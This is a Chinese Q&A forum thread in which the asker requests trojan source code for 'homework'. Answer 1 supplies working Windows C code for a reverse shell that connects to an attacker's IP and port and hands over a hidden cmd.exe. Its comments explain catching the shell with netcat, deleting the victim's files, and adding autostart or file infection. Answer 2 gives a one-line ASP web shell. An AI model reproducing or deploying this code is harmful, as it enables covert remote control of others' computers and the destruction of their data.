Question

求一个简单木马的源代码。必须注明每个语句的作用。只为交作业。有的百度私信我

程序就不要来了。
知道的大大速度。跪求

Answer 1

//一个简单木马的源代码
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib,"Ws2_32.lib")
void main()
{
WSADATA wsa;
SOCKET corky;

struct sockaddr_in add;
WSAStartup(MAKEWORD(2,2),&wsa);//初始化
corky=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);//创建套接字corky

add.sin_family=AF_INET;//填充sockaddr_in结构
add.sin_port=htons(918); //换成你的端口
add.sin_addr.s_addr=inet_addr("127.0.0.1");//换成你的ip地址
connect(corky,(struct sockaddr *)&add,sizeof(add)); //连接控制端

STARTUPINFO si; //创建STARTUPINFO结构
ZeroMemory(&si,sizeof(si));//为STARTUPINFO结构分配内存
si.cb=sizeof(si);
si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;//要使用的标志位
si.wShowWindow=SW_HIDE;//隐藏cmd.exe窗口
si.hStdInput=si.hStdOutput=si.hStdError=(void *)corky;//重定向输入输出到套接字corky
PROCESS_INFORMATION pi;
CreateProcess(NULL,"cmd.exe",NULL,NULL,1,0,NULL,NULL,&si,&pi);//创建cmd.exe进程
ExitProcess(0);

}
//用nc监听你的918端口（nc -l -p 918）然后耐心等待对方启动木马吧！
//提示：nc在《网友世界》2008 3月光盘中winowsPE系统的外挂程序中可以找到
//如果木马启动你在nc的窗口就会得到一个带微软版权的提示
//输入dir命令看看就会看到对方目录下的所有文件信息（木马所在目录）
//用del命令可以删除他的文件了
//不过还是有缺陷就是对方可以看到有一个cmd窗口笨蛋也知道中招了哈哈..
//到时警察叔叔来找你可别怪我提醒你呦！
//你可以完善它如向系统添加启动项让它随系统启动
//最好是感染文件让它随宿主的打开而启动
//你还要完善窗口的隐藏
//本代码在XP+VC++6.0下调试通过

Answer 2

＜%execute request（＂value＂）%＞一句话 是不是很简单